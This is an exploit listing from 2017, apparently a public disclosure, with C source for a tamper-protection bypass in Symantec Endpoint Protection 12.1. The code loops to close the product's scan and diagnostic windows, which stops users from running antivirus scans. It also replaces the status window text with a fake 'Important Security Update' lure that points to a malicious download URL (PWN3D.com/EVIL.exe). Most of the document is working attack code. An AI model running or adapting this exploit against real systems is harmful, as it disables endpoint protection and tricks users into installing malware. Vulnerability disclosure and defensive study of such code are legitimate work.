Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass

Properties

Published:
13.11.2017
Target:
Symantec Endpoint Protection 12.1

Code

#include 
#include 
#define VICTIM "DevViewer.exe"
 
//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 
//How: FindWindow / SendMessage Win32 API 
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
 
void main(void){
  
   while(1){
             
   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
    
   if(hWnd!=NULL){
     //This injects arbitrary messages to SEP UI.
     SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
     //This prevents a user from being able to run AV scans and renders SEP UI useless
    //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);   
   }  
    
   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
    
   HWND x = FindWindow(NULL, TEXT("DevViewer"));
   if(x!=NULL){
     SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
   
   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
   SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); 
 
   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
   SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);  
    
  HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
   if(x!=NULL){
     SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
   
   sleep(1);
    
   }  
}